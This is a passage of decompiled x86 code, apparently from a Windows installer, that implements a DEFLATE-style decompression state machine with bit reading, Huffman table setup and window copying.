                                                							_t446[0x146] = _t425;
                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                							L11:
                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                							E004074F4( *(_t448 + 8));
                                                							return _t443;
                                                						}
                                                						L58:
                                                						__eax = __eax & 0x000003e0;
                                                						if(__eax > 0x3a0) {
                                                							goto L9;
                                                						}
                                                						L59:
                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                						__ebx = __ebx - 0xe;
                                                						_t94 =  &(__esi[2]);
                                                						 *_t94 = __esi[2] & 0x00000000;
                                                						 *__esi = 0xc;
                                                						while(1) {
                                                							L60:
                                                							__esi[1] = __esi[1] >> 0xa;
                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                								goto L68;
                                                							}
                                                							L61:
                                                							while(1) {
                                                								L64:
                                                								if(__ebx >= 3) {
                                                									break;
                                                								}
                                                								L62:
                                                								if( *(__ebp - 0x34) == 0) {
                                                									goto L182;
                                                								}
                                                								L63:
                                                								__eax =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                								__ecx = __ebx;
                                                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                								__ebx = __ebx + 8;
                                                							}
                                                							L65:
                                                							__ecx = __esi[2];
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ebx = __ebx - 3;
                                                							_t108 = __ecx + 0x4084d4; // 0x121110
                                                							__ecx =  *_t108;
                                                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                							__ecx = __esi[1];
                                                							__esi[2] = __esi[2] + 1;
                                                							__eax = __esi[2];
                                                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                								goto L64;
                                                							}
                                                							L66:
                                                							while(1) {
                                                								L68:
                                                								if(__esi[2] >= 0x13) {
                                                									break;
                                                								}
                                                								L67:
                                                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                								__eax =  *_t119;
                                                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                								_t126 =  &(__esi[2]);
                                                								 *_t126 = __esi[2] + 1;
                                                							}
                                                							L69:
                                                							__ecx = __ebp - 8;
                                                							__edi =  &(__esi[0x143]);
                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                							__eax = 0;
                                                							 *(__ebp - 8) = 0;
                                                							__eax =  &(__esi[3]);
                                                							 *__edi = 7;
                                                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                							if(__eax != 0) {
                                                								L72:
                                                								 *__esi = 0x11;
                                                								while(1) {
                                                									L180:
                                                									_t396 =  *_t446;
                                                									if(_t396 > 0xf) {
                                                										break;
                                                									}
                                                									L1:
                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                										case 0:
                                                											L101:
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[5];
                                                											__esi[2] = __esi[5];
                                                											 *__esi = 1;
                                                											goto L102;
                                                										case 1:
                                                											L102:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L105:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L103:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L104:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L106:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __ecx;
                                                											if(__ecx != 0) {
                                                												L108:
                                                												__eflags = __cl & 0x00000010;
                                                												if((__cl & 0x00000010) == 0) {
                                                													L110:
                                                													__eflags = __cl & 0x00000040;
                                                													if((__cl & 0x00000040) == 0) {
                                                														goto L125;
                                                													}
                                                													L111:
                                                													__eflags = __cl & 0x00000020;
                                                													if((__cl & 0x00000020) == 0) {
                                                														goto L9;
                                                													}
                                                													L112:
                                                													 *__esi = 7;
                                                													goto L180;
                                                												}
                                                												L109:
                                                												__esi[2] = __ecx;
                                                												__esi[1] = __eax;
                                                												 *__esi = 2;
                                                												goto L180;
                                                											}
                                                											L107:
                                                											__esi[2] = __eax;
                                                											 *__esi = 6;
                                                											goto L180;
                                                										case 2:
                                                											L113:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L116:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L114:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L115:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L117:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[6];
                                                											__esi[2] = __esi[6];
                                                											 *__esi = 3;
                                                											goto L118;
                                                										case 3:
                                                											L118:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L121:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L119:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L120:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L122:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __cl & 0x00000010;
                                                											if((__cl & 0x00000010) == 0) {
                                                												L124:
                                                												__eflags = __cl & 0x00000040;
                                                												if((__cl & 0x00000040) != 0) {
                                                													goto L9;
                                                												}
                                                												L125:
                                                												__esi[3] = __ecx;
                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                												__esi[2] = __eax;
                                                												goto L180;
                                                											}
                                                											L123:
                                                											__esi[2] = __ecx;
                                                											__esi[3] = __eax;
                                                											 *__esi = 4;
                                                											goto L180;
                                                										case 4:
                                                											L126:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L129:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L127:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L128:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L130:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											 *__esi = 5;
                                                											goto L131;
                                                										case 5:
                                                											L131:
                                                											__eax =  *(__ebp - 0x30);
                                                											__edx = __esi[3];
                                                											__eax = __eax - __esi;
                                                											__ecx = __eax - __esi - 0x1ba0;
                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                												__ecx = __eax;
                                                												__ecx = __eax - __edx;
                                                												__eflags = __ecx;
                                                											} else {
                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                											}
                                                											__eflags = __esi[1];
                                                											 *(__ebp - 0x20) = __ecx;
                                                											if(__esi[1] != 0) {
                                                												L135:
                                                												__edi =  *(__ebp - 0x2c);
                                                												do {
                                                													L136:
                                                													__eflags = __edi;
                                                													if(__edi != 0) {
                                                														goto L152;
                                                													}
                                                													L137:
                                                													__edi = __esi[0x26e8];
                                                													__eflags = __eax - __edi;
                                                													if(__eax != __edi) {
                                                														L143:
                                                														__esi[0x26ea] = __eax;
                                                														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                														__eax = __esi[0x26ea];
                                                														__ecx = __esi[0x26e9];
                                                														__eflags = __eax - __ecx;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__eax >= __ecx) {
                                                															__edi = __esi[0x26e8];
                                                															__edi = __esi[0x26e8] - __eax;
                                                															__eflags = __edi;
                                                														} else {
                                                															__ecx = __ecx - __eax;
                                                															__edi = __ecx - __eax - 1;
                                                														}
                                                														__edx = __esi[0x26e8];
                                                														__eflags = __eax - __edx;
                                                														 *(__ebp - 8) = __edx;
                                                														if(__eax == __edx) {
                                                															__edx =  &(__esi[0x6e8]);
                                                															__eflags = __ecx - __edx;
                                                															if(__ecx != __edx) {
                                                																__eax = __edx;
                                                																__eflags = __eax - __ecx;
                                                																 *(__ebp - 0x30) = __eax;
                                                																if(__eax >= __ecx) {
                                                																	__edi =  *(__ebp - 8);
                                                																	__edi =  *(__ebp - 8) - __eax;
                                                																	__eflags = __edi;
                                                																} else {
                                                																	__ecx = __ecx - __eax;
                                                																	__edi = __ecx;
                                                																}
                                                															}
                                                														}
                                                														__eflags = __edi;
                                                														if(__edi == 0) {
                                                															goto L183;
                                                														} else {
                                                															goto L152;
                                                														}
                                                													}
                                                													L138:
                                                													__ecx = __esi[0x26e9];
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx == __edx) {
                                                														goto L143;
                                                													}
                                                													L139:
                                                													__eax = __edx;
                                                													__eflags = __eax - __ecx;
                                                													if(__eax >= __ecx) {
                                                														__edi = __edi - __eax;
                                                														__eflags = __edi;
                                                													} else {
                                                														__ecx = __ecx - __eax;
                                                														__edi = __ecx;
                                                													}
                                                													__eflags = __edi;
                                                													if(__edi == 0) {
                                                														goto L143;
                                                													}
                                                													L152:
                                                													__ecx =  *(__ebp - 0x20);
                                                													 *__eax =  *__ecx;
                                                													__eax = __eax + 1;
                                                													__ecx = __ecx + 1;
                                                													__edi = __edi - 1;
                                                													__eflags = __ecx - __esi[0x26e8];
                                                													 *(__ebp - 0x30) = __eax;
                                                													 *(__ebp - 0x20) = __ecx;
                                                													 *(__ebp - 0x2c) = __edi;
                                                													if(__ecx == __esi[0x26e8]) {
                                                														__ecx =  &(__esi[0x6e8]);
                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                													}
                                                													_t357 =  &(__esi[1]);
                                                													 *_t357 = __esi[1] - 1;
                                                													__eflags =  *_t357;
                                                												} while ( *_t357 != 0);
                                                											}
                                                											goto L23;
                                                										case 6:
                                                											L156:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__edi =  *(__ebp - 0x30);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L172:
                                                												__cl = __esi[2];
                                                												 *__edi = __cl;
                                                												__edi = __edi + 1;
                                                												__eax = __eax - 1;
                                                												 *(__ebp - 0x30) = __edi;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												goto L23;
                                                											}
                                                											L157:
                                                											__ecx = __esi[0x26e8];
                                                											__eflags = __edi - __ecx;
                                                											if(__edi != __ecx) {
                                                												L163:
                                                												__esi[0x26ea] = __edi;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edi = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edi - __ecx;
                                                												 *(__ebp - 0x30) = __edi;
                                                												if(__edi >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edi;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edi;
                                                													__eax = __ecx - __edi - 1;
                                                												}
                                                												__edx = __esi[0x26e8];
                                                												__eflags = __edi - __edx;
                                                												 *(__ebp - 8) = __edx;
                                                												if(__edi == __edx) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx != __edx) {
                                                														__edi = __edx;
                                                														__eflags = __edi - __ecx;
                                                														 *(__ebp - 0x30) = __edi;
                                                														if(__edi >= __ecx) {
                                                															__eax =  *(__ebp - 8);
                                                															__eax =  *(__ebp - 8) - __edi;
                                                															__eflags = __eax;
                                                														} else {
                                                															__ecx = __ecx - __edi;
                                                															__eax = __ecx;
                                                														}
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L172;
                                                												}
                                                											}
                                                											L158:
                                                											__eax = __esi[0x26e9];
                                                											__edx =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edx;
                                                											if(__eax == __edx) {
                                                												goto L163;
                                                											}
                                                											L159:
                                                											__edi = __edx;
                                                											__eflags = __edi - __eax;
                                                											if(__edi >= __eax) {
                                                												__ecx = __ecx - __edi;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edi;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L172;
                                                											} else {
                                                												goto L163;
                                                											}
                                                										case 7:
                                                											L173:
                                                											__eflags = __ebx - 7;
                                                											if(__ebx > 7) {
                                                												__ebx = __ebx - 8;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                												_t380 = __ebp - 0x38;
                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                												__eflags =  *_t380;
                                                											}
                                                											goto L175;
                                                										case 8:
                                                											L4:
                                                											while(_t425 < 3) {
                                                												if( *(_t448 - 0x34) == 0) {
                                                													goto L182;
                                                												} else {
                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                													_t425 = _t425 + 8;
                                                													continue;
                                                												}
                                                											}
                                                											_t425 = _t425 - 3;
                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                											asm("sbb ecx, ecx");
                                                											_t408 = _t406 >> 1;
                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                											if(_t408 == 0) {
                                                												L24:
                                                												 *_t446 = 9;
                                                												_t436 = _t425 & 0x00000007;
                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                												_t425 = _t425 - _t436;
                                                												goto L180;
                                                											}
                                                											L6:
                                                											_t411 = _t408 - 1;
                                                											if(_t411 == 0) {
                                                												L13:
                                                												__eflags =  *0x432e90;
                                                												if( *0x432e90 != 0) {
                                                													L22:
                                                													_t412 =  *0x40a5e8; // 0x9
                                                													_t446[4] = _t412;
                                                													_t413 =  *0x40a5ec; // 0x5
                                                													_t446[4] = _t413;
                                                													_t414 =  *0x431d0c; // 0x0
                                                													_t446[5] = _t414;
                                                													_t415 =  *0x431d08; // 0x0
                                                													_t446[6] = _t415;
                                                													L23:
                                                													 *_t446 =  *_t446 & 0x00000000;
                                                													goto L180;
                                                												} else {
                                                													_t26 = _t448 - 8;
                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                													__eflags =  *_t26;
                                                													_t416 = 0x431d10;
                                                													goto L15;
                                                													L20:
                                                													 *_t416 = _t438;
                                                													_t416 = _t416 + 4;
                                                													__eflags = _t416 - 0x432190;
                                                													if(_t416 < 0x432190) {
                                                														L15:
                                                														__eflags = _t416 - 0x431f4c;
                                                														_t438 = 8;
                                                														if(_t416 > 0x431f4c) {
                                                															__eflags = _t416 - 0x432110;
                                                															if(_t416 >= 0x432110) {
                                                																__eflags = _t416 - 0x432170;
                                                																if(_t416 < 0x432170) {
                                                																	_t438 = 7;
                                                																}
                                                															} else {
                                                																_t438 = 9;
                                                															}
                                                														}
                                                														goto L20;
                                                													} else {
                                                														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                														_push(0x1e);
                                                														_pop(_t440);
                                                														_push(5);
                                                														_pop(_t419);
                                                														memset(0x431d10, _t419, _t440 << 2);
                                                														_t450 = _t450 + 0xc;
                                                														_t442 = 0x431d10 + _t440;
                                                														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                														 *0x432e90 =  *0x432e90 + 1;
                                                														__eflags =  *0x432e90;
                                                														goto L22;
                                                													}
                                                												}
                                                											}
                                                											L7:
                                                											_t423 = _t411 - 1;
                                                											if(_t423 == 0) {
                                                												 *_t446 = 0xb;
                                                												goto L180;
                                                											}
                                                											L8:
                                                											if(_t423 != 1) {
                                                												goto L180;
                                                											}
                                                											goto L9;
                                                										case 9:
                                                											while(1) {
                                                												L27:
                                                												__eflags = __ebx - 0x20;
                                                												if(__ebx >= 0x20) {
                                                													break;
                                                												}
                                                												L25:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L26:
                                                												__eax =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__ecx = __ebx;
                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L28:
                                                											__eax =  *(__ebp - 0x40);
                                                											__ebx = 0;
                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                											 *(__ebp - 0x40) = 0;
                                                											__eflags = __eax;
                                                											__esi[1] = __eax;
                                                											if(__eax == 0) {
                                                												goto L53;
                                                											}
                                                											L29:
                                                											_push(0xa);
                                                											_pop(__eax);
                                                											goto L54;
                                                										case 0xa:
                                                											L30:
                                                											__eflags =  *(__ebp - 0x34);
                                                											if( *(__ebp - 0x34) == 0) {
                                                												goto L182;
                                                											}
                                                											L31:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L48:
                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                													__eax =  *(__ebp - 0x34);
                                                												}
                                                												__ecx = __esi[1];
                                                												__eflags = __ecx - __eax;
                                                												__edi = __ecx;
                                                												if(__ecx >= __eax) {
                                                													__edi = __eax;
                                                												}
                                                												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                												_t80 =  &(__esi[1]);
                                                												 *_t80 = __esi[1] - __edi;
                                                												__eflags =  *_t80;
                                                												if( *_t80 == 0) {
                                                													L53:
                                                													__eax = __esi[0x145];
                                                													L54:
                                                													 *__esi = __eax;
                                                												}
                                                												goto L180;
                                                											}
                                                											L32:
                                                											__ecx = __esi[0x26e8];
                                                											__edx =  *(__ebp - 0x30);
                                                											__eflags = __edx - __ecx;
                                                											if(__edx != __ecx) {
                                                												L38:
                                                												__esi[0x26ea] = __edx;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edx = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edx - __ecx;
                                                												 *(__ebp - 0x30) = __edx;
                                                												if(__edx >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edx;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edx;
                                                													__eax = __ecx - __edx - 1;
                                                												}
                                                												__edi = __esi[0x26e8];
                                                												 *(__ebp - 0x2c) = __eax;
                                                												__eflags = __edx - __edi;
                                                												if(__edx == __edi) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __edx - __ecx;
                                                													if(__eflags != 0) {
                                                														 *(__ebp - 0x30) = __edx;
                                                														if(__eflags >= 0) {
                                                															__edi = __edi - __edx;
                                                															__eflags = __edi;
                                                															__eax = __edi;
                                                														} else {
                                                															__ecx = __ecx - __edx;
                                                															__eax = __ecx;
                                                														}
                                                														 *(__ebp - 0x2c) = __eax;
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L48;
                                                												}
                                                											}
                                                											L33:
                                                											__eax = __esi[0x26e9];
                                                											__edi =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edi;
                                                											if(__eax == __edi) {
                                                												goto L38;
                                                											}
                                                											L34:
                                                											__edx = __edi;
                                                											__eflags = __edx - __eax;
                                                											 *(__ebp - 0x30) = __edx;
                                                											if(__edx >= __eax) {
                                                												__ecx = __ecx - __edx;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__eax != 0) {
                                                												goto L48;
                                                											} else {
                                                												goto L38;
                                                											}
                                                										case 0xb:
                                                											goto L56;
                                                										case 0xc:
                                                											L60:
                                                											__esi[1] = __esi[1] >> 0xa;
                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                												goto L68;
                                                											}
                                                											goto L61;
                                                										case 0xd:
                                                											while(1) {
                                                												L93:
                                                												__eax = __esi[1];
                                                												__ecx = __esi[2];
                                                												__edx = __eax;
                                                												__eax = __eax & 0x0000001f;
                                                												__edx = __edx >> 5;
                                                												__eax = __edx + __eax + 0x102;
                                                												__eflags = __esi[2] - __eax;
                                                												if(__esi[2] >= __eax) {
                                                													break;
                                                												}
                                                												L73:
                                                												__eax = __esi[0x143];
                                                												while(1) {
                                                													L76:
                                                													__eflags = __ebx - __eax;
                                                													if(__ebx >= __eax) {
                                                														break;
                                                													}
                                                													L74:
                                                													__eflags =  *(__ebp - 0x34);
                                                													if( *(__ebp - 0x34) == 0) {
                                                														goto L182;
                                                													}
                                                													L75:
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                													__ecx = __ebx;
                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                													__ebx = __ebx + 8;
                                                													__eflags = __ebx;
                                                												}
                                                												L77:
                                                												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                												__eax = __eax &  *(__ebp - 0x40);
                                                												__ecx = __esi[0x144];
                                                												__eax = __esi[0x144] + __eax * 4;
                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                												__eflags = __eax - 0x10;
                                                												 *(__ebp - 0x14) = __eax;
                                                												if(__eax >= 0x10) {
                                                													L79:
                                                													__eflags = __eax - 0x12;
                                                													if(__eax != 0x12) {
                                                														__eax = __eax + 0xfffffff2;
                                                														 *(__ebp - 8) = 3;
                                                													} else {
                                                														_push(7);
                                                														 *(__ebp - 8) = 0xb;
                                                														_pop(__eax);
                                                													}
                                                													while(1) {
                                                														L84:
                                                														__ecx = __eax + __edx;
                                                														__eflags = __ebx - __eax + __edx;
                                                														if(__ebx >= __eax + __edx) {
                                                															break;
                                                														}
                                                														L82:
                                                														__eflags =  *(__ebp - 0x34);
                                                														if( *(__ebp - 0x34) == 0) {
                                                															goto L182;
                                                														}
                                                														L83:
                                                														__ecx =  *(__ebp - 0x38);
                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                														__ecx = __ebx;
                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                														__ebx = __ebx + 8;
                                                														__eflags = __ebx;
                                                													}
                                                													L85:
                                                													__ecx = __edx;
                                                													__ebx = __ebx - __edx;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                													__edx =  *(__ebp - 8);
                                                													__ebx = __ebx - __eax;
                                                													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                													__ecx = __eax;
                                                													__eax = __esi[1];
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													__ecx = __esi[2];
                                                													__eax = __eax >> 5;
                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                													__eax = __eax & 0x0000001f;
                                                													__eax = __edi + __eax + 0x102;
                                                													__edi = __edx + __ecx;
                                                													__eflags = __edx + __ecx - __eax;
